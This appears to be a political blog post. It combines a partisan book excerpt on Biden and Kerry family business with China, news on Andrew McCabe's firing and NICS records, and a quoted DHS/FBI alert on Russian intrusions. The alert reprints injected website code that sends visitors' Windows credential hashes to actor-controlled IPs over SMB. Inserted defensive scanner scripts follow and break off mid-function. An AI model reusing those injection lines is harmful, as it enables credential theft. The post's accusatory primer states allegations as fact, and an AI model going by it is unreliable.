Keep this post in your bookmarks as we enter the 2020 general election.
Primer:
1. China plants industrial espionage operatives in the U.S. who steal government contract secrets and sell them back to China. The FBI has caught at least one.
2. Through cyber espionage, China has stolen much of the F-35 technology, more than 50 terabytes.
3. John Kerry and Joe Biden did exactly the same thing as Hillary: sold access for money while exploiting it all as diplomatic missions under the title of bilateral agreements.
4. Subpoena former Treasury Secretary Jack Lew and ask him about the CFIUS approvals of Chinese-backed enterprises. We may also need to go back to former Treasury Secretary Tim Geithner: did he set the table for all this, with Obama’s approval, by creating the ‘Asia Pivot’?
5. What does Congress know about foreign investments, and when did they know it? They get reports, but is anyone asking questions?
NYP: Joe Biden and John Kerry have been pillars of the Washington establishment for more than 30 years. Biden is one of the most popular politicians in our nation’s capital.
His demeanor, sense of humor, and even his friendly gaffes have allowed him to form close relationships with both Democrats and Republicans. His public image is built around his “Lunch Bucket Joe” persona. As he reminds the American people on regular occasions, he has little wealth to show for his career, despite having reached the vice presidency.
One of his closest political allies in Washington is former senator and former Secretary of State John Kerry. “Lunch Bucket Joe” he ain’t; Kerry is more patrician than earthy. But the two men became close while serving for several decades together in the US Senate. The two “often talked on matters of foreign policy,” says Jules Witcover in his Biden biography.
So their sons going into business together in June 2009 was not exactly a bolt out of the blue.
But with whom their sons cut lucrative deals while the elder two were steering the ship of state is more of a surprise.
What Hunter Biden, the son of America’s vice president, and Christopher Heinz, the stepson of the chairman of the Senate Committee on Foreign Relations (later to be secretary of state), were creating was an international private equity firm. It was anchored by the Heinz family alternative investment fund, Rosemont Capital. The new firm would be populated by political loyalists and positioned to strike profitable deals overseas with foreign governments and officials with whom the US government was negotiating.
Hunter Biden, Vice President Joe Biden’s youngest son, had gone through a series of jobs since graduating from Yale Law School in 1996, including the hedge-fund business.
By the summer of 2009, the 39-year-old Hunter joined forces with the son of another powerful figure in American politics, Chris Heinz. Senator John Heinz of Pennsylvania had tragically died in a 1991 airplane crash when Chris was 18. Chris, his brothers, and his mother inherited a large chunk of the family’s vast ketchup fortune, including a network of investment funds and a Pennsylvania estate, among other properties. In May 1995, his mother, Teresa, married Senator John Kerry of Massachusetts. That same year, Chris graduated from Yale, and then went on to get his MBA from Harvard Business School.
Joining them in the Rosemont venture was Devon Archer, a longtime Heinz and Kerry friend.
The three friends established a series of related LLCs. The trunk of the tree was Rosemont Capital, the alternative investment fund of the Heinz Family Office. Rosemont Farm is the name of the Heinz family’s 90-acre estate outside Fox Chapel, Pennsylvania.
The small fund grew quickly. According to an email revealed as part of a Securities and Exchange Commission investigation, Rosemont described themselves as “a $2.4 billion private equity firm co-owned by Hunter Biden and Chris Heinz,” with Devon Archer as “Managing Partner.”
The partners attached several branches to the Rosemont Capital trunk, including Rosemont Seneca Partners, LLC, Rosemont Seneca Technology Partners, and Rosemont Realty.
Of the various deals in which these Rosemont entities were involved, one of the largest and most troubling concerns was Rosemont Seneca Partners.
Rather than set up shop in New York City, the financial capital of the world, Rosemont Seneca leased space in Washington, DC. They occupied an all-brick building on Wisconsin Avenue, the main thoroughfare of exclusive Georgetown. Their offices would be less than a mile from John and Teresa Kerry’s 23-room Georgetown mansion, and just two miles from both Joe Biden’s office in the White House and his residence at the Naval Observatory.
Over the next seven years, as both Joe Biden and John Kerry negotiated sensitive and high-stakes deals with foreign governments, Rosemont entities secured a series of exclusive deals often with those same foreign governments.
Some of the deals they secured may remain hidden. These Rosemont entities are, after all, within a private equity firm and as such are not required to report or disclose their financial dealings publicly.
Some of their transactions are nevertheless traceable by investigating world capital markets. A troubling pattern emerges from this research, showing how profitable deals were struck with foreign governments on the heels of crucial diplomatic missions carried out by their powerful fathers. Often those foreign entities gained favorable policy actions from the United States government just as the sons were securing favorable financial deals from those same entities.
Nowhere is that more true than in their commercial dealings with Chinese government-backed enterprises.
Rosemont Seneca joined forces in doing business in China with another politically connected consultancy called the Thornton Group. The Massachusetts-based firm is headed by James Bulger, the nephew of the notorious mob hitman James “Whitey” Bulger. Whitey was the leader of the Winter Hill Gang, part of the South Boston mafia. Under indictment for 19 murders, he disappeared. He was later arrested, tried, and convicted.
James Bulger’s father, Whitey’s younger brother, Billy Bulger, serves on the board of directors of the Thornton Group. He was the longtime leader of the Massachusetts state Senate and, with their long overlap by state and by party, a political ally of Massachusetts Senator John Kerry.
Less than a year after opening Rosemont Seneca’s doors, Hunter Biden and Devon Archer were in China, having secured access at the highest levels. Thornton Group’s account of the meeting on their Chinese-language website was telling: Chinese executives “extended their warm welcome” to the “Thornton Group, with its US partner Rosemont Seneca chairman Hunter Biden (second son of the now Vice President Joe Biden).”
The purpose of the meetings was to “explore the possibility of commercial cooperation and opportunity.” Curiously, details about the meeting do not appear on their English-language website.
Also, according to the Thornton Group, the three Americans met with the largest and most powerful government fund leaders in China — even though Rosemont was both new and small.
The timing of this meeting was also curious. It occurred just hours before Hunter Biden’s father, the vice president, met with Chinese President Hu in Washington as part of the Nuclear Security Summit.
There was a second known meeting with many of the same Chinese financial titans in Taiwan in May 2011. For a small firm like Rosemont Seneca with no track record, it was an impressive level of access to China’s largest financial players. And it was just two weeks after Joe Biden had opened up the US-China strategic dialogue with Chinese officials in Washington.
On one of the first days of December 2013, Hunter Biden was jetting across the Pacific Ocean aboard Air Force Two with his father and daughter Finnegan. The vice president was heading to Asia on an extended official trip. Tensions in the region were on the rise.
The American delegation was visiting Japan, China, and South Korea. But it was the visit to China that had the most potential to generate conflict and controversy. The Obama administration had instituted the “Asia Pivot” in its international strategy, shifting attention away from Europe and toward Asia, where China was flexing its muscles.
For Hunter Biden, the trip coincided with a major deal that Rosemont Seneca was striking with the state-owned Bank of China. From his perspective, the timing couldn’t have been better.
Vice President Biden, Hunter Biden and Finnegan arrived to a red carpet and a delegation of Chinese officials. Greeted by Chinese children carrying flowers, the delegation was then whisked to a meeting with Vice President Li Yuanchao and talks with President Xi Jinping.
Hunter and Finnegan Biden joined the vice president for tea with US Ambassador Gary Locke at the Liu Xian Guan Teahouse in the Dongcheng District in Beijing. Where Hunter Biden spent the rest of his time on the trip remains largely a mystery. There are actually more reports of his daughter Finnegan’s activities than his.
What was not reported was the deal that Hunter was securing. Rosemont Seneca Partners had been negotiating an exclusive deal with Chinese officials, which they signed approximately 10 days after Hunter visited China with his father. The most powerful financial institution in China, the government’s Bank of China, was setting up a joint venture with Rosemont Seneca.
The Bank of China is an enormously powerful financial institution. But the Bank of China is very different from the Bank of America. The Bank of China is government-owned, which means that its role as a bank blurs into its role as a tool of the government. The Bank of China provides capital for “China’s economic statecraft,” as scholar James Reilly puts it. Bank loans and deals often occur within the context of a government goal.
Rosemont Seneca and the Bank of China created a $1 billion investment fund called Bohai Harvest RST (BHR), a name that reflected who was involved. Bohai (or Bo Hai), the innermost gulf of the Yellow Sea, was a reference to the Chinese stake in the company. The “RS” referred to Rosemont Seneca. The “T” was Thornton.
The fund enjoyed an unusual and special status in China. BHR touted its “unique Sino-US shareholding structure” and “the global resources and network” that allowed it to secure investment “opportunities.” Funds were backed by the Chinese government.
In short, the Chinese government was literally funding a business that it co-owned along with the sons of two of America’s most powerful decision makers.
The partnership between American princelings and the Chinese government was just a beginning. The actual investment deals that this partnership made were even more problematic. Many of them would have serious national security implications for the United States.
In 2015, BHR joined forces with the automotive subsidiary of the Chinese state-owned military aviation contractor Aviation Industry Corporation of China (AVIC) to buy American “dual-use” parts manufacturer Henniges.
AVIC is a major military contractor in China. It operates “under the direct control of the State Council” and produces a wide array of fighter and bomber aircraft, transports, and drones — primarily designed to compete with the United States.
The company also has a long history of stealing Western technology and applying it to military systems. The year before BHR joined with AVIC, the Wall Street Journal reported that the aviation company had stolen technologies related to the US F-35 stealth fighter and incorporated them in their own stealth fighter, the J-31. AVIC has also been accused of stealing US drone systems and using them to produce their own.
In September 2015, when AVIC bought 51 percent of American precision-parts manufacturer Henniges, the other 49 percent was purchased by the Biden-and-Kerry-linked BHR.
Henniges is recognized as a world leader in anti-vibration technologies in the automotive industry and for its precise, state-of-the-art manufacturing capabilities. Anti-vibration technologies are considered “dual-use” because they can have a military application, according to both the State Department and Department of Commerce.
The technology is also on the restricted Commerce Control List used by the federal government to limit the exports of certain technologies. For that reason, the Henniges deal would require the approval of the Committee on Foreign Investment in the United States (CFIUS), which reviews sensitive business transactions that may have a national security implication.
According to BHR internal documents, the Henniges deal included “arduous and often-times challenging negotiations.” The CFIUS review in 2015 included representatives from numerous government agencies including John Kerry’s State Department.
The deal was approved in 2015.
Excerpted with permission from “Secret Empires: How the American Political Class Hides Corruption and Enriches Family and Friends,” by Peter Schweizer, published by Harper Collins. The book goes on sale March 20.
Details on the Firing of FBI Dep. Director Andrew McCabe
Just after midnight Saturday, President Donald Trump reacted to the news in a Twitter message:
“Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy,” the president wrote, “Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!”
The termination, which was triggered by internal reviews and came a little more than a day before McCabe was set to retire, sparked a war of words between McCabe and President Donald Trump.
Politico: Attorney General Jeff Sessions fired former FBI Deputy Director Andrew McCabe Friday night, dismissing the longtime bureau veteran who had been publicly pilloried by President Donald Trump and sparking a new war of words between McCabe and Trump.
Sessions said the firing — carried out a little more than a day before McCabe was set to retire from the FBI — was triggered by internal reviews that concluded McCabe violated Justice Department policies and was not forthcoming with investigators probing FBI actions before the 2016 presidential election.
Justice Department officials determined that “McCabe had made an unauthorized disclosure to the news media and lacked candor — including under oath — on multiple occasions,” the attorney general said in a statement.
“The FBI expects every employee to adhere to the highest standards of honesty, integrity, and accountability,” Sessions added.
McCabe quickly lashed back Friday, linking the firing to the repeated public flogging he faced from Trump. The former FBI No. 2 also tied his dismissal to the fact that he can support former FBI Director James Comey’s account that he was fired because of an unwillingness to shut down the investigation into the Trump campaign’s alleged ties to Russia.
“Here is the reality: I am being singled out and treated this way because of the role I played, the actions I took, and the events I witnessed in the aftermath of the firing of James Comey,” McCabe said in a statement. “The release of this report was accelerated only after my testimony to the House Intelligence Committee revealed that I would corroborate former Director Comey’s accounts of his discussions with the President.”
“The fact that [Trump] has said all these things about me, he’s made all these attacks, he’s gone on and on — you can’t dismiss it, that’s the problem,” McCabe told POLITICO in an interview earlier this month. “That’s why presidents don’t typically attack senior executives in the FBI, because they would never even want to create the impression that that sort of improper influence could be taking place.”
Shortly after midnight, Trump hit back, tweeting: “Andrew McCabe FIRED, a great day for the hard working men and women of the FBI – A great day for Democracy. Sanctimonious James Comey was his boss and made McCabe look like a choirboy. He knew all about the lies and corruption going on at the highest levels of the FBI!”
Prominent Democratic lawmakers expressed skepticism about Sessions’ decision, but seemed cautious about denouncing the action until Inspector General Michael Horowitz’s review is released. Many Democrats have praised Horowitz, whose office prepared the report that appears to have harshly criticized McCabe.
“In the absence of the IG report, it’s impossible to evaluate the merits of this harsh treatment of a 21-year FBI professional. That it comes after the President urged the DOJ to deprive McCabe of his pension, and after his testimony, gives the action an odious taint,” the top Democrat on the House Intelligence Committee, Adam Schiff of California, tweeted.
“I am going to reserve judgment on Mr. McCabe’s conduct until the Inspector General completes his report,” the House Judiciary Committee’s ranking Democrat, Jerrold Nadler of New York, said. “But I am certain that President Trump has attacked the reputation of a career public servant, and his wife, and the rest of the leadership of the Department of Justice—and those attacks leave us all questioning whether the Attorney General has made the right decision.”
By contrast, Rep. Lee Zeldin (R-N.Y.) quickly embraced Sessions’ move.
“Decisive, appropriate, timely action by @jeffsessions to fire Andrew McCabe. DOJ/FBI are legendary, historic, important agencies filled w/amazing men & women held to highest standards,” Zeldin wrote on Twitter. “McCabe was a ringleader of rogue actors who were a shameful exception at top; not the norm.”
Mark Meadows, the leader of the conservative House Freedom Caucus, said that McCabe’s termination showed the need to add another special counsel to probe the FBI.
“This decision is not surprising based on information that continues to unfold on a daily basis,” Meadows said.
The embattled FBI deputy, who was due to officially retire on Sunday, had stepped down in January after facing repeated public and private rebukes from the president. Trump criticized his handling of the Hillary Clinton email investigation and accused McCabe of bias, citing his wife’s political ties to a prominent Democrat.
McCabe has been at the center of a Justice Department inspector general examination of the bureau’s activities prior to the 2016 election, including the investigation into the Clinton email matter. The FBI’s Office of Professional Responsibility had recommended that McCabe be fired, citing findings from the Justice Department’s inspector general’s report, which is expected to be released within weeks.
Sessions’ statement did not detail the precise allegations against McCabe. However, the fired FBI official’s own statement and text messages released by the Senate Judiciary Committee indicate that investigators concluded he ordered the disclosure of information to a Wall Street Journal reporter about an ongoing investigation into the Clinton Foundation.
As McCabe was under fire over donations his wife received for her Democratic campaign for the Virginia Senate, he indicated he had pressed to keep the foundation-related probe advancing even as Justice Department officials questioned its merit.
“This entire investigation stems from my efforts, fully authorized under FBI rules, to set the record straight on behalf of the Bureau, and to make clear that we were continuing an investigation that people in DOJ opposed,” McCabe said. The disclosure “was not a secret, it took place over several days, and others, including the Director, were aware of the interaction with the reporter,” the former FBI No. 2 added.
McCabe has pushed back at the timing of the inspector general’s report, suggesting that Trump’s frequent criticism of him has driven the speed with which the investigation concluded with a recommendation to terminate him.
“I have never before seen the type of rush to judgment and rush to summary punishment that we have witnessed in this case,” McCabe’s attorney Michael Bromwich said in a statement. “This is simply not the way such matters are generally handled in the DOJ or the FBI. It is deeply disturbing.”
The president of the FBI Agents Association, Thomas O’Connor, issued a statement Friday night that appeared to express concern that politics may have influenced McCabe’s dismissal.
“While the FBIAA does not comment on personnel matters, the Association remains fully committed to ensuring that every FBIAA member is provided appropriate procedural protections. The FBIAA also strongly believes that personnel decisions should never be politicized,” O’Connor said.
Sessions’ statement indicated that the firing was also endorsed by the Justice Department’s top career official, Associate Deputy Attorney General Scott Schools. The statement did not indicate why the disciplinary process, which can often take more than a year, appears to have been dramatically accelerated in McCabe’s case.
After stepping down in January, McCabe went on “terminal leave,” intending to remain on the government payroll until his planned retirement on March 18. The firing is likely to cost McCabe hundreds of thousands of dollars by rendering McCabe ineligible for his full government pension and by delaying his right to any payout for almost seven years. Legal experts say McCabe’s options to challenge the firing are few because most FBI employees have little legal recourse against attempts to punish them over alleged misconduct.
A spokeswoman for McCabe declined to comment Friday night on whether he is planning a lawsuit.
McCabe told POLITICO earlier this month that he was “essentially removed from my job” in January following information “shared with” Christopher Wray, the FBI’s current director, “before the investigation was concluded.”
“I refused to serve in any other capacity other than deputy, and so I left on terminal leave,” McCabe said. Trump announced in June that he would nominate Wray to replace Comey. Wray took over the job in August, after being confirmed by the Senate.
Trump had questioned McCabe’s impartiality, citing the fact that his wife received funds from then-Virginia Gov. Terry McAuliffe, a Democrat and longtime political ally of Clinton, in a failed bid for the State Legislature in 2015.
“How can FBI Deputy Director Andrew McCabe, the man in charge, along with leakin’ James Comey, of the Phony Hillary Clinton investigation (including her 33,000 illegally deleted emails) be given $700,000 for wife’s campaign by Clinton Puppets during investigation?” Trump tweeted in December. Trump abruptly fired Comey as FBI director in May, saying he was “unable to effectively lead the Bureau.”
In a separate post, Trump added that McCabe was “racing the clock to retire with full benefits.”
Last summer, Trump questioned why Sessions had not already replaced McCabe, whom he labeled a “friend” of Comey’s.
The firing raised concerns about the integrity of the FBI’s examination of possible Russian election meddling in 2016 and potential ties to Trump campaign aides, an investigation that McCabe subsequently took charge of as acting director of the bureau.
McCabe began his bureau career at the New York field office in 1996. In January 2016, under former President Barack Obama, he was appointed to the bureau’s No. 2 position by Comey.
Obama Ordered 500,000 Fugitives Deleted from Gun Background Check System
So, while the national student walkout is partisan and in cadence with the Democrats, with yet another march scheduled later this month, there is a bombshell revealed in testimony at a congressional hearing.
On Wednesday, acting FBI deputy director David Bowdich testified during a Senate Judiciary Committee hearing that former President Barack Obama’s Department of Justice forced the FBI to delete over 500,000 fugitives, who had outstanding arrest warrants, from the National Instant Criminal Background Check System (NICS).
“It’s my understanding that under federal law fugitives cannot legally purchase or possess guns,” Senator Dianne Feinstein (D-CA) began. “We’ve heard from local law enforcement that the Justice Department has issued a memo that forced the FBI NICS background check database to drop more than 500,000 names of fugitives with outstanding arrest warrants because it was uncertain whether those fugitives had fled across state lines.”
“Mr. Bowdich, can you describe why this determination was made by the Justice Department?” Feinstein asked.
“That was a decision that was made under the previous administration,” Bowdich replied. “It was the Department of Justice’s Office of Legal Counsel that reviewed the law and believed that it needed to be interpreted so that if someone was a fugitive in a state, there had to be indications that they had crossed state lines.”
Advance the video of the hearing to the 58:51 mark.
According to The Washington Post, the FBI considered any person with an outstanding arrest warrant to be a fugitive. On the other hand, the Bureau of Alcohol Tobacco, Firearms and Explosives defined a fugitive as someone who has an outstanding arrest warrant and has crossed state lines.
That disagreement was settled at the end of Obama’s second term, when the Justice Department’s Office of Legal Counsel sided with the ATF’s interpretation. Under President Donald Trump, the DOJ defined a fugitive as a person who went to another state to dodge criminal prosecution or evade giving testimony in criminal court, and implemented the Office of Legal Counsel’s decision. The decision meant that around half a million fugitives were removed from the National Instant Criminal Background Check System.
CERT/FBI Declaration of Russia Hacking U.S. Infrastructure
US sanctions Russia for election interference, cyberattacks
The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”
CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”
The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.
The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”
The sanctions come after an investigation by the Department of Homeland Security and the FBI.
The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a troll farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.
The Russian embassy didn’t respond to a request for comment.
‘A long-overdue step’
On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.
“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.
Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.
“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”
Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.
The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”
Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.
The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.
Systems Affected
- Domain Controllers
- File Servers
- Email Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.
DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).
For a downloadable copy of IOC packages and associated files, see:
- TA18-074A_TLP_WHITE.csv
- TA18-074A_TLP_WHITE.stix.xml
- MIFR-10127623_TLP_WHITE.pdf
- MIFR-10127623_TLP_WHITE_stix.xml
- MIFR-10128327_TLP_WHITE.pdf
- MIFR-10128327_TLP_WHITE_stix.xml
- MIFR-10128336_TLP_WHITE.pdf
- MIFR-10128336_TLP_WHITE_stix.xml
- MIFR-10128830_TLP_WHITE.pdf
- MIFR-10128830_TLP_WHITE_stix.xml
- MIFR-10128883_TLP_WHITE.pdf
- MIFR-10128883_TLP_WHITE_stix.xml
- MIFR-10135300_TLP_WHITE.pdf
- MIFR-10135300_TLP_WHITE_stix.xml
Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
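The packages listed above ship indicators as CSV and STIX. As an added example (not part of the alert and not the format of the alert's own files), the script below shows the check a defender would run with them: load an indicator list and sweep proxy log lines for exact IP hits, CIDR-range hits and domain/subdomain hits. The three-column CSV layout, the indicator values and the log lines are all constructed for the example; when loading the real TA18-074A CSV, substitute the column names it actually uses.

```python
"""Sweep proxy/DNS log lines against a TLP:WHITE-style indicator list.

Everything below is constructed for illustration: the CSV layout is an
assumed three-column form, the indicator values are documentation ranges
and a reserved TLD, and the log lines were written for this example.
"""
import csv
import io
import ipaddress
import re

# Constructed indicator list in an ASSUMED layout (not the alert's real file).
SAMPLE_IOC_CSV = """indicator,type,description
203.0.113.45,ipv4,staging server (constructed)
198.51.100.0/24,ipv4-net,watering-hole hosting range (constructed)
example-hr-portal.invalid,domain,spoofed HR portal (constructed)
"""

# Constructed proxy log lines: timestamp, client, method, target, status.
SAMPLE_LOGS = [
    "2018-03-12T09:14:03Z 10.0.4.17 GET http://www.example-hr-portal.invalid/login.php 200",
    "2018-03-12T09:14:09Z 10.0.4.17 CONNECT 203.0.113.45:443 200",
    "2018-03-12T09:15:40Z 10.0.4.22 GET http://updates.example.com/patch.exe 200",
    "2018-03-12T09:16:02Z 10.0.4.17 GET http://198.51.100.77/wp-content/theme.js 200",
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)


def load_iocs(csv_text):
    """Split the indicator list into exact IPs, CIDR networks and domains."""
    ips, nets, domains = set(), [], set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        value = row["indicator"].strip().lower()
        kind = row["type"].strip().lower()
        if kind == "ipv4":
            ips.add(value)
        elif kind == "ipv4-net":
            nets.append(ipaddress.ip_network(value, strict=False))
        elif kind == "domain":
            domains.add(value)
    return ips, nets, domains


def match_line(line, iocs):
    """Return [(indicator_type, matched_value)] for every hit in one line."""
    ips, nets, domains = iocs
    hits = []
    for ip_s in IPV4_RE.findall(line):
        try:
            ip = ipaddress.ip_address(ip_s)
        except ValueError:          # e.g. 999.1.1.1 is not an address
            continue
        if ip_s in ips:
            hits.append(("ipv4", ip_s))
        elif any(ip in net for net in nets):
            hits.append(("ipv4-net", ip_s))
    for host in HOST_RE.findall(line):
        h = host.lower()
        if IPV4_RE.fullmatch(h):     # already handled as an address
            continue
        # Exact domain or any subdomain of a listed domain.
        if h in domains or any(h.endswith("." + d) for d in domains):
            hits.append(("domain", h))
    return hits


def scan(lines, csv_text):
    """Return [(line, hits)] for the lines that matched at least one IOC."""
    iocs = load_iocs(csv_text)
    results = []
    for line in lines:
        hits = match_line(line, iocs)
        if hits:
            results.append((line, hits))
    return results


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS, SAMPLE_IOC_CSV):
        print(hits, "<-", line)
```

Subdomain matching matters because a listed domain rarely appears in logs exactly as written; range matching catches neighbours of a listed hosting IP without a separate indicator for each.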
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]
This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”
Technical Details
The threat actors in this campaign employed a variety of TTPs, including
- spear-phishing emails (sent from compromised legitimate accounts),
- watering-hole domains,
- credential gathering,
- open-source and network reconnaissance,
- host-based exploitation, and
- targeting industrial control system (ICS) infrastructure.
Using Cyber Kill Chain for Analysis
DHS used the Lockheed Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section provides a high-level overview of the threat actors’ activities within this framework.
Stage 1: Reconnaissance
The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.
Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.
Stage 2: Weaponization
Spear-Phishing Email TTPs
Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm.) As part of the standard processes executed by Microsoft Word, this request authenticates the client to the server, sending the user’s credential hash (the NTLM challenge-response) to the remote server before retrieving the requested file. (Note: the credential transfer occurs even if the file is never retrieved, so a failed or empty download is not evidence that nothing leaked.) After obtaining a credential hash, the threat actors can use password-cracking techniques to recover the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
Use of Watering Hole Domains
One of the threat actors’ primary uses for staging targets was to develop watering holes. The threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes host legitimate content developed by reputable organizations, the threat actors altered the websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content, altering JavaScript and PHP files to request a file icon over SMB from an IP address they controlled. This request accomplishes the same credential-harvesting technique observed in the spear-phishing documents. In one instance, the threat actors added a single line to “header.php”, a legitimate PHP file on the compromised site, so that every visiting browser issued the SMB request:
<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />
In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:
var i = document.createElement("img");
i.src = "file[:]//184.154.150[.]66/ame_icon.png"; i.width = 3; i.height = 2;
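The two injected snippets above and the remote-template lure in the spear-phishing documents rely on the same primitive: a reference that makes a Windows client open an outbound SMB session to a host the attacker controls. The scanner below is an added example, not code from the alert, and checks both artifact types offline. It unpacks an Office document (an OOXML zip) and reports every external relationship whose target would be fetched over SMB, and it extracts file:// and UNC references from HTML, PHP or JavaScript. The sample document it builds is a constructed minimal package rather than a real Word file, and the 192.0.2.10 address is a documentation placeholder for the actor-controlled host.

```python
"""Offline scanner for the SMB credential-harvesting lures in TA18-074A:
remote-template relationships inside Office documents and file:// / UNC
references injected into web content.  Added example, not alert code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# A file:// URI or UNC path with a real host part.  file:///C:/... (local
# drive) is excluded by the lookahead, so only targets that force Windows to
# open an outbound SMB session are reported.
SMB_TARGET = re.compile(
    r"(?i)(?:file://|file:\\\\|\\\\)(?=[^\s\"'<>|/\\])[^\s\"'<>|]+"
)


def suspicious_rels(docx_bytes):
    """Return (rels part, relationship type, target) for every external
    relationship in an OOXML package whose target is an SMB location.
    Word resolves attachedTemplate (and image/OLE) relationships when the
    document opens, which triggers the NTLM authentication described in
    the alert."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and SMB_TARGET.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, target))
    return hits


def suspicious_web_refs(text):
    """Return every file:// or UNC reference found in a web file (HTML, PHP,
    JavaScript), covering both the <img src="file://..."> tag and the
    document.createElement("img") variant."""
    return [m.group(0) for m in SMB_TARGET.finditer(text)]


def build_sample_docx(template_target):
    """Constructed minimal OOXML package (not a real Word file) that carries
    an attachedTemplate relationship pointing at `template_target`."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{PKG_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/settings.xml", "<settings/>")
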